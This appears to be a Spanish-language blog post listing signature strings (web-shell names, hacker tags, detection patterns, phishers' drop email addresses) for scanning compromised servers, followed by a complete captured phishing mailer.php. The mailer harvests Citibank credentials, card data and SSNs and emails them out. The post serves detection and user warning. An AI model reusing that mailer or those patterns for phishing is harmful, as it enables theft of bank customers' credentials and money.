Os dejo un listado con las cadenas de texto habituales encontradas en servidores y hostings compartidos que han sido hackeados e inyectados con código PHP con mailers y phising.

Como podéis observar de un vistazo rápido, algunas cadenas son, directamente, direcciones de correo de destinatarios que reciben los correos electrónicos enviados desde webs falsas (phising) que simulan ser entidades bancarias de distinto tipo. Estos sistemas se usan para recibir datos de clientes bancarios para ser usados de forma ilícita.

Esta lista puede ser útil para realizar una búsqueda en todo el servidor con objeto de encontrar si han conseguido inyectar código en el sistema, lo que os pondría en una situación compleja y vulnerable.

@DEFINITIONS = (
q['1337w0rm'],
q['ক্ষ্যাপা রুস্ত&#2478'],
q['31.184.192.250'],
q['313.legend.rocks'],
q['33db9538.com'],
q['3FT Hna Pour unzipi'],
q['3xp1r3 Cyber Army'],
q['40000 Emails This May Hack The Server'],
q['54dfa1cb.com'],
q['5P!R!7 #UN73R'],
q['7iemH yb dekcah'],
q['83.133.123.174'],
q['8m0slmesh'],
q['fukq'],
q['fuckyou4321'],
q['connectjbmoveisok'],
q['MATRIX CYBER TEAM'],
q['Hacked By.D34DCYB3R'],
q['Ownedby|v!nc3'],
q['---:||Wellsfargo||:---'],
q['HiDder OwnZz You'],
q['adorablejimalvarez@gmail.com'],
q['afoikoko@gmail.com'],
q['gabkinihun@gmail.com'],
q['akamai.net'],
q['Al3x M@rken'],
q['ALARENG?N'],
q['alcustomer1984@gmail.com'],
q['alextho676@gmail.com'],
q['skyline@cash4u.com'],
q['horneymace@gmail.com'],
q['alipay'],
q['Alliance Rezult'],
q['alubarika4ever@gmail.com'],
q['Ani-Shell'],
q['AnonGhost'],
q['aoldocs'],
q['Automatic cPanel Finder/Cracker'],
q['aWYgKGlzc2V0KCRfUkVRVUVTVFsnc'],
q['axabanque.fr'],
q['AXA Banque ReZulT'],
q['aykutbilgic@gmail.com,'],
q['ayotomiwa11@gmail.com'],
q['ayoubaittoto@gmail.com'],
q['b374k'],
q['BackBone'],
q['BACK-CONNECT'],
q['BACKDOOR'],
q['B.A.D TEAM'],
q['bangladeshblackhat'],
q['bankofamerica.com'],
q['base64_decode(\"DQplcnJvcl9yZXBvcnRpbmcoM'],
q['bash_history'],
q['bbhhinternational'],
q['bckdrprm'],
q['BD BLACK HAT HACKERS'],
q['bdblackhat.net'],
q['Bd Xtor'],
q['Bella!'],
q['bella_mafia_quackafella'],
q['BHP.php'],
q['bitchx'],
q['BLACKMANSNOOP'],
q['Blackportt'],
q['BLAZING HACKERS PAKISTAN'],
q['Bl@cK Ic3'],
q['BoffMax'],
q['bomba1'],
q['botnet'],
q['brewer_armstrong@yahoo.com,'],
q['BrotherHood'],
q['burayaoraya'],
q['by KingSolomon'],
q['by misafir'],
q['By  NaZZ'],
q['C0D3D'],
q['C0d3d by kid brizy'],
q['c0d3d by lionaneesh'],
q['C0o5@yahoo.com'],
q['c99'],
q['c999sh_surl'],
q['C99 Modified By Psych0'],
q['Captain Crunch'],
q['cardnumber:'],
q['Casper_Cell'],
q['ccteam.ru'],
q['cdob1s'],
q['centurylink.com'],
q['CGI-Telnet'],
q['Ch3rn0by1'],
q['cha88.cn'],
q['Chakus'],
q['chase.com'],
q['Chase USA '],
q['Check Mail Pass Login Access'],
q['chishijen12'],
q['Chizzy'],
q['chizzyspamm@gmail.com'],
q['chr(112).chr(49)'],
q['chukuma0000007@yahoo.com'],
q['CIA@MYWORK'],
q['cocuk escort'],
q['Cod3d by 3xp1r3'],
q['Cod3d by Haxor-Waha'],
q['CODED BY RAB3OUN'],
q['Coded By - SaMir InjectOr'],
q['Coded by van1lle @ Hackforums.net'],
q['+Codewizard+'],
q['Codz by angel(4ngel)'],
q['columbuscolumbus45@gmail.com'],
q['copy 2010, MeGo'],
q['Coupdegrace'],
q['CPanel Bruteforce'],
q['cPanel Cracker'],
q['cpcracker.py'],
q['cracktype'],
q['Crash & Burn'],
q['cwings'],
q['cxib [ a.T] securityreason [ d0t] com'],
q['Cyb3r-DZ Config'],
q['cyberheroez.ddos.im'],
q['Cyb er Hunter'],
q['CyberTeamRox'],
q['d0mains'],
q['d3b~X'],
q['D4rkSect0r'],
q['dalnet'],
q['DamaneDz'],
q['dangerissaoui@outlook.com.fr,'],
q['danielgrochowski1@gmail.com'],
q['dannymckay'],
q['Dark.anGel'],
q['defaced'],
q['defacer'],
q['Developed By Mohajer22'],
q['Developed By sNiper_hEx'],
q['Developer by SnIpEr_SA'],
q['Dhanush'],
q['DHL WIRE LOG'],
q['die(PHP_OS.chr(49).chr(48).chr(43).md5(0987654321'],
q['directmail'],
q['DK Shell'],
q['DM Mini Shell'],
q['DoitSelf'],
q['donflow2015@yahoo.com'],
q['downserverdown@gmail.com'],
q['drive.google.com'],
q['dr.t3rr0r'],
q['easywaylogs@outlook.com'],
q['EBSCO ReZulTsz'],
q['Eddie Kidiw'],
q['EdiT3R: Dr.KAsBeR'],
q['Edited By GuN-Jack'],
q['eelqnn@yandex.ru,'],
q['eelsmarch@gmail.com'],
q['ef50185@gmail.com'],
q['eggdrop'],
q['E@GL3 STR!K3R'],
q['eIAgn9fjRC68DC7QIDhGN43qSDcw2'],
q['ejykesouth@gmail.com'],
q['engcolinjj@gmail.com'],
q['EXIT_KERNEL_TO_NULL'],
q['expl0i13r'],
q['F13xy,'],
q['fake mailer'],
q['faqux1@gmail.com'],
q['fedora.chen.polymet@gmail.com'],
q['FeeLCoMz'],
q['FilesMa'],
q['FilesTools'],
q['focusyearme@yahoo.com'],
q['[+] Founded '],
q['fourofour'],
q['free shell'],
q['freshnewly@she.com,'],
q['FULLZ LoGiN'],
q['Fx29Sh'],
q['Gantengers'],
q['ggmail.html'],
q['G-Google ACCU'],
q['GIF89a.*[\r\n]*.*<\?php'],
q['goodnewsyeso@gmail.com'],
q['goodslife201'],
q['Gr0ss-mailer'],
q['Greetz'],
q['Group x3'],
q['guardservices'],
q['gujj4rPcP'],
q['H3r03ZiM0uZ'],
q['H3r3 !s 411 D0m4!ns &amp; Us3rs'],
q['H4CK3R'],
q['hackattackdude@gmail.com,'],
q['hack-back'],
q['Hackeado'],
q['HACKED'],
q['hacked by '],
q['HacKeD By {{LaMiN3 DK}}, Algerian Defacer'],
q['Hacked ByP!R!7'],
q['Hacked By Ulow'],
q['Hacked in 2015 By \[ Mr.PROTOCOL'\]],
q['HACKER Yar'],
q['hackmeplz'],
q['HackTeam'],
q['HA$KEL'],
q['Haxor'],
q['hfbakhsh.com'],
q['HiM! Wire'],
q['Hmei7'],
q['homeaway.com'],
q['H_P_J'],
q['hrhbox2015@gmail.com'],
q['H@SEB'],
q['http://c99.me/base/jquery.js'],
q['http://emp3ror.com/kira/'],
q['http://safecheck1.net/check.html'],
q['http://stayinfranschhoek.co.za'],
q['http://upload.sa3eka.com/upa/133301473417.png'],
q['http://www.ahdal.com/css'],
q['huken90@gmail.com'],
q['iamtriumphant07@gmail.com'],
q['icloud.com'],
q['ifrm'],
q['iLL Skillz'],
q['IN73CT0R'],
q['Inbox Mass Mailer'],
q['Indramayu'],
q['infoicb76@gmail.com'],
q['infos@Aguda.ng,'],
q['InjecT0r'],
q['inspiredlean@gmai.com,'],
q['intuit.com'],
q['isek500@aol.com'],
q['ISI PESAN'],
q['iskorpitx'],
q['Its m3 :p'],
q['JAAALiiiK'],
q['jacksmith3811@gmail.com'],
q['jamesmathinsclaims@gmail.com'],
q['jbossass.war'],
q['jessica_biel_naked_in_my_bed.c'],
q['jexboss'],
q['joaomatosf.com'],
q['johnsonjames002dc@outlook.com,'],
q['Joky Priv8'],
q['Jombang Cyber Team'],
q['JPMorgan Chase'],
q['k2ll33d'],
q['k4l0nk'],
q['kaMtiEz'],
q['Karar alShaMi'],
q['KAYBLAAK2015@GMAIL.COM'],
q['kinbokun2234@gmail.com,'],
q['Kish0r3 P4sh4'],
q['kntnight@gmail.com,'],
q['kohehasa@gmail.com'],
q['$kola'],
q['krad.c'],
q['kunlexy,'],
q['L4z4ru5'],
q['lassp2030@gmail.com,'],
q['leahmc1@rocketmail.com,'],
q['Legend Bot'],
q['legend.rocks'],
q['Linux vmsplice Local Root Exploit'],
q['LockeD By Joky'],
q['LOCUS7S.COM'],
q['Locus7s Modified c100 Shell'],
q['login.yahoo.com'],
q['Lon.Cua.Co.Be'],
q['LorD-C0d3r-NT'],
q['LorD of IRAN HACKERS SABOTAGE'],
q['Lov3rDns'],
q['LoVe511 Mail3R'],
q['Ludarubma'],
q['Luge Racer'],
q['luis.arnold12@yahoo.com'],
q['lymanlymco,'],
q['LyMaNlYmCo@YahoO.CoM'],
q['m0rtix'],
q['MaDLeeTs'],
q['Powered By leetc0des.blogspot.com'],
q['madubueze.simon@yahoo.com'],
q['MailBox Renewal Portal'],
q['Maile Inbox By'],
q['Mailer by X-Nero'],
q['mail.yahoo.com'],
q['MainHack'],
q['Maked By '],
q['Make in China'],
q['marli.vianna00@gmail.com'],
q['MaStEr HaCkEr'],
q['MCA Shell'],
q['md5decrpter'],
q['mercychase1@gmail.com'],
q['mesaegs'],
q['micr0s0flt.acc0unt@hotmail.com'],
q['milw0rm'],
q['Mirror Zone-BBHH'],
q['Miyachung'],
q['Mizt3riO-uZ'],
q['ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ'],
q['Modified by Shadow & Preddy'],
q['Modon Tak'],
q['monoki.atspace.com'],
q['Monsters Defacers'],
q['MooT HaCkEr - NaiF KSA'],
q['morganstanley.com'],
q['Moroccan H4x0r'],
q['Mr-Anobs'],
q['/* Mr.HiTman */'],
q['Mr-Lordz'],
q['Mr.PoorBAD@Alpha.com'],
q['MugiwaraCrew'],
q['mugiwaranoluffy@fastmail.com'],
q['multiviews'],
q['MYREALDAY'],
q['myrealday1@gmail.com'],
q['NeEeO_HaCk'],
q['NetJackal'],
q['netjackal.by.ru'],
q['Newbie3viLc063s + h3x4Crew + RileksCrew Family'],
q['newlife1470@gmail.com'],
q['newmeak@gmail.com'],
q['newsupdated@servisd.com,'],
q['newsupdate@servicedrive.com,'],
q['newsupdate@servisdropbox.com,'],
q['ninja_1263'],
q['Ninja-Security'],
q['notification.job@gmail.com,'],
q['oficeofthe@gmail.com'],
q['online encode by cha88.cn'],
q['Open-Realty'],
q['OrionsHunter'],
q['Ov3rLorD'],
q['owned by '],
q['ownersdirectorsintl@gmail.com'],
q['P0150n Op3r470r'],
q['p1mmaxweel@gmail.com,'],
q['Pankaj Sharma'],
q['PATO LOKO PARA DE VIADAGEM'],
q['paulodadaj1@gmail.com'],
q['++====\[ PayPal \]====++'],
q['PayPal US Bank Spam ReZulT'],
q['Peruvian R00lz'],
q['Ph33r'],
q['PHP: Eval+(GZINFLATE||GZUNCOMPRESS||B64||ROT13)'],
q['php_ini@126.com'],
q['PHPJackal'],
q['PHP_OS.chr\(49\).chr\(48\).chr\(43\)'],
q['PHP_OS.chr\(49\).chr\(49\).chr\(43\)'],
q['phpremoteview'],
q['phpshell'],
q['phpsploitclass.php'],
q['phpspypass'],
q['php SSH'],
q['Pinpal'],
q['Plugin Name: WordPress Plugin Manager'],
q['pOcOpOcO'],
q['Post DC Back Connect'],
q['POST['GmailAddress']'],
q['powered by os comerce'],
q['PR0L3T3RS'],
q['prepare_the_exploit'],
q['Priv8 2011 Attack Shell'],
q['Private Mailer 6.2'],
q['Procoderz Team Albania'],
q['psherwoodmarketing@gmail.com'],
q['psybnc'],
q['r00txxPcP'],
q['r0nin'],
q['r3v3ng4ns'],
q['R4ZW4N BIN SUL4IM4N'],
q['r57'],
q['rab3oun.net'],
q['raslan58'],
q['Recoded By XGHoSTn'],
q['Recovery Email Address:'],
q['rednoize'],
q['regions.com'],
q['Re-Modified by #!physx^'],
q['Remote Code Execution Exploit'],
q['reply@result.com'],
q['reputable3811@yandex.com'],
q['resultbox99999@gmail.com'],
q['resultshere2@gmail.com,'],
q['romio2_100@yahoo.com'],
q['ROOTSHELL'],
q['rosekellymsk2@gmail.com,'],
q['royalbank.com'],
q['rWmpisiBWQglW/n3OBtqwt8T0NwjeiW+8Kd9N'],
q['Ryan Duff and Firas Durri'],
q['@s3n4t00r'],
q['s3n4t00r'],
q['S4!Lh34t'],
q['S4MP4H'],
q['saatchiart.com'],
q['SaM Shell'],
q['sandranix001@hotmail.com,,'],
q['Say To Safemode Go To HeLl By php.ini'],
q['sc.imp.live.com'],
q['scotiabank.com,'],
q['Secsion<infos@hacker_Shenzen>'],
q['Security Angel Team [S4T]'],
q['SecurityBus'],
q['sec-w.com'],
q['semi-priv8'],
q['Setor PP Boz'],
q['sh3LL'],
q['Sh4hien'],
q['sHaf00n'],
q['shawnphill77345@aol.in'],
q['Sheko H4CK3R'],
q['shellbot'],
q['shellinvoker'],
q['SILVER FOX'],
q['slac4ever@gmail.com,'],
q['SNMP cracker'],
q['spam_rezult@spammerindo.com,'],
q['spendit.laulau@yahoo.co'],
q['Spirit Hunder'],
q['Spyk1r4'],
q['spymeta'],
q['startonthisfuckingpoint'],
q['storesbrown147@gmail.com,'],
q['str_rot13'],
q['SultanHaikal'],
q['susanalbert1980@gmail.com,'],
q['suthallen@gmail.com'],
q['sysctl -n kern'],
q['Tak Ada Kata'],
q['TC9A16C47DA8EEE87'],
q['TeaM HacKer EgypT'],
q['Th3 K!ng Scam'],
q['TheChozen'],
q['The Cyber Heroez White-Hat Crew'],
q['The file you want Downloadable was nonexistent'],
q['TheLords'],
q['The r600 mailer has finished his job'],
q['TOBILOBA'],
q['toolzmorathy1'],
q['totallyfreecursors.com'],
q['True Login (via cURL) Scams'],
q['TrYaG'],
q['TrYaG AcaDemY'],
q['Turbo Force By TrYaG.CC'],
q['turkblackhats'],
q['turkishkebab00@gmail.com'],
q['T�x�� Ph��t�m'],
q['undernet'],
q['UnkCrew'],
q['Upl04d3r'],
q['upl0ad'],
q['Upload Success !!!'],
q['UP="pentagon"'],
q['usaa.com'],
q['Use this function to check in witch domain zones user comes'],
q['usta upload basarili olmadi.Baska siteye dal!!'],
q['van1lle'],
q['vandal'],
q['vecweb.net.ua'],
q['VERSION mIRC version by LaNTaK GaNTeNG'],
q['victim@host.com'],
q['VISA_DYALNA'],
q['vito-RawckerheaD'],
q['VNC ScaNNer by ARZ'],
q['void\.ru'],
q['vulnscan'],
q['W1R3'],
q['W3lc0m3 M4st3r'],
q['w4ck1ng'],
q['w7h7j7c57.homepage.t-online.de'],
q['Webmail Of Sellers'],
q['webmaster@altavistadelago.com'],
q['Webshell'],
q['Web Shell'],
q['wellsfargo.com'],
q['wfagoss@gmail.com'],
q['What is your favourite plac?'],
q['WHIT3 DR4G0N'],
q['WHMCS KILLER V3 CODED BY RAB3OUN'],
q['williambell101@yahoo.com,'],
q['williambell1233@gmail.com,'],
q['wkendy76@blumail.org'],
q['wolu yb dekcah'],
q['wonderfulboy01@gmai.com'],
q['wrgggthhd'],
q['WScript.Shell'],
q['WSOsetcookie'],
q['www.adobe.com.zip'],
q['www.c99.me'],
q['WwW.Gaza-Hacker.NeT'],
q['xplOi73r'],
q['X-Sn!p3r_P4l'],
q['xXEz'],
q['y2Google'],
q['YAHOO 2015'],
q['YAHOO.membership'],
q['yahoopassword'],
q['YeMeNi HaCkeR'],
q['zen.co.uk'],
q['ziteditora.com.br'],
);

Ejemplo de mailer.php inyectado en un servidor VPS. Este script se ejecuta tras intriducir los datos del usuario en una web que simula el banco Citibank. La apariencia es idéntica a la del banco original excepto el cifrado SSL que te garantiza estar en la web correcta. Es importante que nunca accedáis a vuestro banco sin confirmar que realmente estáis en la web del mismo.

<?
$ip = getenv("REMOTE_ADDR");
$message .= "--------------Citi Bank Info-----------------------\n";
$message .= "Userid : ".$_POST['id']."\n";
$message .= "Password : ".$_POST['pass']."\n";
$message .= "--------------Citi Bank Info-----------------------\n";
$message .= "Card Name : ".$_POST['formtext1']."\n";
$message .= "Card No : ".$_POST['formtext2']."\n";
$message .= "Expire MM : ".$_POST['formtext3']."\n";
$message .= "Expire YY : ".$_POST['formtext5']."\n";
$message .= "CVV : ".$_POST['formtext4']."\n";
$message .= "SSN : ".$_POST['formtext6']."\n";
$message .= "DateOfBirth DD : ".$_POST['formtext7']."\n";
$message .= "DateOfBirth MM : ".$_POST['formtext8']."\n";
$message .= "DateOfBirth YY : ".$_POST['formtext9']."\n";
$message .= "Full Name : ".$_POST['formtext10']."\n";
$message .= "Zip Code : ".$_POST['formtext11']."\n";
$message .= "Phone No : ".$_POST['formtext12']."\n";
$message .= "IP : ".$ip."\n";
$message .= "---------------Created BY unknown-------------\n";
$send = "hackattackdude@gmail.com";
$subject = "Result from Unknown";
$headers = "From: Citi Bank<customer-support@Spammers>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
$arr=array($send, $IP);
foreach ($arr as $send)
{
mail($send,$subject,$message,$headers);
mail($to,$subject,$message,$headers);
}
header("Location: https://online.citibank.com/US/JSO/signon/CBOLSessionRecovery.do");
?>

Referencia: https://github.com/cPanelPeter/infection_scanner/blob/master/infections.txt

Referencia: investigación interna de Informática Coslada

A %d blogueros les gusta esto: